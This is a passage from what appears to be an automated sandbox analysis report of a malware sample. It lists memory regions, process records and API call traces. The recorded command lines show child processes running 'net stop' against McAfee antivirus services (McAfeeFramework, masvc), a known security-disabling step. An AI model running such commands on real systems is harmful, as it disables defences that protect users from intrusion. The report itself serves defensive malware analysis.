= 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5970 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5971 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 5972 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5973 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5974 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5975 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 5976 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5977 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5978 start_va = 0x7fffffd9000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 5979 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 5980 start_va = 0x1c0000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5981 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5982 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 543 os_tid = 0xc34 Process: id = "130" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5fef2000" os_pid = "0x10e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop McAfeeFramework /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6003 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6004 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6005 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6006 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 6007 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6008 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6009 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6010 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 6011 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6012 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6013 start_va = 0x7fffffd4000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 6014 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 6015 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 6016 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6017 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6180 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6181 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6182 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6183 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 6184 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 6185 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6186 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6187 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 6188 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 6189 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 6190 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 6191 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 6192 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 6193 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 6194 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 6195 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6196 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6197 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6198 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6199 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 545 os_tid = 0x1024 Process: id = "131" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x547a2000" os_pid = "0x10d8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "124" os_parent_pid = "0x1010" cmd_line = "C:\\Windows\\system32\\net1 stop masvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6018 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6019 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6020 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6021 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 6022 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6023 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6024 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6025 start_va = 0xff190000 end_va = 0xff1c2fff entry_point = 0xff190000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 6026 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6027 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6028 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 6029 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 6045 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 6046 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6047 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 6071 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6072 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 6073 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6074 start_va = 0x100000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 6075 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 6076 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6077 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6078 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 6079 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 6080 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 6081 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 6082 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 6083 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 6084 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 6085 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 6086 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 6087 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 6088 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 6089 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 6090 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6091 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 6092 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6093 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 6094 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 547 os_tid = 0xcb8 [0098.538] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf970 | out: lpSystemTimeAsFileTime=0x1cf970*(dwLowDateTime=0xefe6f070, dwHighDateTime=0x1d48689)) [0098.538] GetCurrentProcessId () returned 0x10d8 [0098.538] GetCurrentThreadId () returned 0xcb8 [0098.538] GetTickCount () returned 0x226d1 [0098.538] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf978 | out: lpPerformanceCount=0x1cf978*=1814545600000) returned 1 [0098.540] GetModuleHandleW (lpModuleName=0x0) returned 0xff190000 [0098.540] __set_app_type (_Type=0x1) [0098.540] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff1a9c9c) returned 0x0 [0098.540] __getmainargs (in: _Argc=0xff1b4780, _Argv=0xff1b4790, _Env=0xff1b4788, _DoWildCard=0, _StartInfo=0xff1b479c | out: _Argc=0xff1b4780, _Argv=0xff1b4790, _Env=0xff1b4788) returned 0 [0098.540] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0098.540] GetConsoleOutputCP () returned 0x1b5 [0098.540] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff1bcec0 | out: lpCPInfo=0xff1bcec0) returned 1 [0098.541] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0098.543] sprintf_s (in: _DstBuf=0x1cf918, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0098.543] setlocale (category=0, locale=".437") returned="English_United States.437" [0098.544] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0098.544] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0098.544] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop masvc /y" [0098.544] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cf6b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0098.545] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0098.545] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cf908 | out: Buffer=0x1cf908*=0x374d40) returned 0x0 [0098.545] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cf908 | out: Buffer=0x1cf908*=0x37c0e0) returned 0x0 [0098.545] _fileno (_File=0x7fefdba2a80) returned 0 [0098.545] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0098.545] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0098.545] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0098.545] _wcsicmp (_String1="config", _String2="stop") returned -16 [0098.545] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0098.545] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0098.545] _wcsicmp (_String1="file", _String2="stop") returned -13 [0098.545] _wcsicmp (_String1="files", _String2="stop") returned -13 [0098.545] _wcsicmp (_String1="group", _String2="stop") returned -12 [0098.545] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0098.545] _wcsicmp (_String1="help", _String2="stop") returned -11 [0098.545] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0098.545] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0098.545] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0098.545] _wcsicmp (_String1="session", _String2="stop") returned -15 [0098.545] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0098.545] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0098.545] _wcsicmp (_String1="share", _String2="stop") returned -12 [0098.546] _wcsicmp (_String1="start", _String2="stop") returned -14 [0098.546] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0098.546] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0098.546] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0098.546] _wcsicmp (_String1="accounts", _String2="masvc") returned -12 [0098.546] _wcsicmp (_String1="computer", _String2="masvc") returned -10 [0098.546] _wcsicmp (_String1="config", _String2="masvc") returned -10 [0098.546] _wcsicmp (_String1="continue", _String2="masvc") returned -10 [0098.546] _wcsicmp (_String1="cont", _String2="masvc") returned -10 [0098.546] _wcsicmp (_String1="file", _String2="masvc") returned -7 [0098.546] _wcsicmp (_String1="files", _String2="masvc") returned -7 [0098.546] _wcsicmp (_String1="group", _String2="masvc") returned -6 [0098.546] _wcsicmp (_String1="groups", _String2="masvc") returned -6 [0098.546] _wcsicmp (_String1="help", _String2="masvc") returned -5 [0098.546] _wcsicmp (_String1="helpmsg", _String2="masvc") returned -5 [0098.546] _wcsicmp (_String1="localgroup", _String2="masvc") returned -1 [0098.546] _wcsicmp (_String1="pause", _String2="masvc") returned 3 [0098.546] _wcsicmp (_String1="session", _String2="masvc") returned 6 [0098.546] _wcsicmp (_String1="sessions", _String2="masvc") returned 6 [0098.546] _wcsicmp (_String1="sess", _String2="masvc") returned 6 [0098.546] _wcsicmp (_String1="share", _String2="masvc") returned 6 [0098.546] _wcsicmp (_String1="start", _String2="masvc") returned 6 [0098.546] _wcsicmp (_String1="stats", _String2="masvc") returned 6 [0098.546] _wcsicmp (_String1="statistics", _String2="masvc") returned 6 [0098.546] _wcsicmp (_String1="stop", _String2="masvc") returned 6 [0098.546] _wcsicmp (_String1="time", _String2="masvc") returned 7 [0098.546] _wcsicmp (_String1="user", _String2="masvc") returned 8 [0098.546] _wcsicmp (_String1="users", _String2="masvc") returned 8 [0098.546] _wcsicmp (_String1="msg", _String2="masvc") returned 18 [0098.546] _wcsicmp (_String1="messenger", _String2="masvc") returned 4 [0098.546] _wcsicmp (_String1="receiver", _String2="masvc") returned 5 [0098.546] _wcsicmp (_String1="rcv", _String2="masvc") returned 5 [0098.546] _wcsicmp (_String1="netpopup", _String2="masvc") returned 1 [0098.547] _wcsicmp (_String1="redirector", _String2="masvc") returned 5 [0098.547] _wcsicmp (_String1="redir", _String2="masvc") returned 5 [0098.547] _wcsicmp (_String1="rdr", _String2="masvc") returned 5 [0098.547] _wcsicmp (_String1="workstation", _String2="masvc") returned 10 [0098.547] _wcsicmp (_String1="work", _String2="masvc") returned 10 [0098.547] _wcsicmp (_String1="wksta", _String2="masvc") returned 10 [0098.547] _wcsicmp (_String1="prdr", _String2="masvc") returned 3 [0098.547] _wcsicmp (_String1="devrdr", _String2="masvc") returned -9 [0098.547] _wcsicmp (_String1="lanmanworkstation", _String2="masvc") returned -1 [0098.547] _wcsicmp (_String1="server", _String2="masvc") returned 6 [0098.547] _wcsicmp (_String1="svr", _String2="masvc") returned 6 [0098.547] _wcsicmp (_String1="srv", _String2="masvc") returned 6 [0098.547] _wcsicmp (_String1="lanmanserver", _String2="masvc") returned -1 [0098.547] _wcsicmp (_String1="alerter", _String2="masvc") returned -12 [0098.547] _wcsicmp (_String1="netlogon", _String2="masvc") returned 1 [0098.547] _wcsupr (in: _String="masvc" | out: _String="MASVC") returned="MASVC" [0098.547] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x37c900 [0098.551] GetServiceKeyNameW (in: hSCManager=0x37c900, lpDisplayName="MASVC", lpServiceName=0xff1b5750, lpcchBuffer=0x1cf828 | out: lpServiceName="", lpcchBuffer=0x1cf828) returned 0 [0098.552] _wcsicmp (_String1="msg", _String2="MASVC") returned 18 [0098.552] _wcsicmp (_String1="messenger", _String2="MASVC") returned 4 [0098.552] _wcsicmp (_String1="receiver", _String2="MASVC") returned 5 [0098.552] _wcsicmp (_String1="rcv", _String2="MASVC") returned 5 [0098.552] _wcsicmp (_String1="redirector", _String2="MASVC") returned 5 [0098.552] _wcsicmp (_String1="redir", _String2="MASVC") returned 5 [0098.552] _wcsicmp (_String1="rdr", _String2="MASVC") returned 5 [0098.552] _wcsicmp (_String1="workstation", _String2="MASVC") returned 10 [0098.552] _wcsicmp (_String1="work", _String2="MASVC") returned 10 [0098.552] _wcsicmp (_String1="wksta", _String2="MASVC") returned 10 [0098.552] _wcsicmp (_String1="prdr", _String2="MASVC") returned 3 [0098.553] _wcsicmp (_String1="devrdr", _String2="MASVC") returned -9 [0098.553] _wcsicmp (_String1="lanmanworkstation", _String2="MASVC") returned -1 [0098.553] _wcsicmp (_String1="server", _String2="MASVC") returned 6 [0098.553] _wcsicmp (_String1="svr", _String2="MASVC") returned 6 [0098.553] _wcsicmp (_String1="srv", _String2="MASVC") returned 6 [0098.553] _wcsicmp (_String1="lanmanserver", _String2="MASVC") returned -1 [0098.553] _wcsicmp (_String1="alerter", _String2="MASVC") returned -12 [0098.553] _wcsicmp (_String1="netlogon", _String2="MASVC") returned 1 [0098.553] NetServiceControl (in: servername=0x0, service="MASVC", opcode=0x0, arg=0x0, bufptr=0x1cf830 | out: bufptr=0x1cf830) returned 0x889 [0098.554] wcscpy_s (in: _Destination=0xff1b80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0098.554] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0098.554] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff1b5b50, nSize=0x800, Arguments=0xff1b7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0098.556] GetFileType (hFile=0xb) returned 0x2 [0098.556] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf6f8 | out: lpMode=0x1cf6f8) returned 1 [0098.556] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff1b5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1cf6f0, lpReserved=0x0 | out: lpBuffer=0xff1b5b50*, lpNumberOfCharsWritten=0x1cf6f0*=0x1e) returned 1 [0098.557] GetFileType (hFile=0xb) returned 0x2 [0098.557] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf6f8 | out: lpMode=0x1cf6f8) returned 1 [0098.557] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff191efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf6f0, lpReserved=0x0 | out: lpBuffer=0xff191efc*, lpNumberOfCharsWritten=0x1cf6f0*=0x2) returned 1 [0098.557] _ultow (in: _Dest=0x889, _Radix=1898336 | out: _Dest=0x889) returned="2185" [0098.558] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff1b5b50, nSize=0x800, Arguments=0xff1b7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0098.558] GetFileType (hFile=0xb) returned 0x2 [0098.558] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf6f8 | out: lpMode=0x1cf6f8) returned 1 [0098.558] WriteConsoleW (in: 